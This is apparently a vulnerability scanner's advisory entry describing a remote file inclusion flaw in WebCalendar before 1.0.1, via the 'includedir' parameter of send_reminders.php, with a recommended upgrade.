icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons icons_061

WebCalendar < 1.0.1 send_reminders.php includedir Parameter Remote File Inclusion

High

Synopsis

The remote host is vulnerable to a script injection attack.

Description

The remote version of WebCalendar fails to sanitize user-supplied input to the 'includedir' parameter of the 'send_reminders.php' script. By leveraging this flaw, an attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts.

Solution

Upgrade to version 1.0.1 or higher.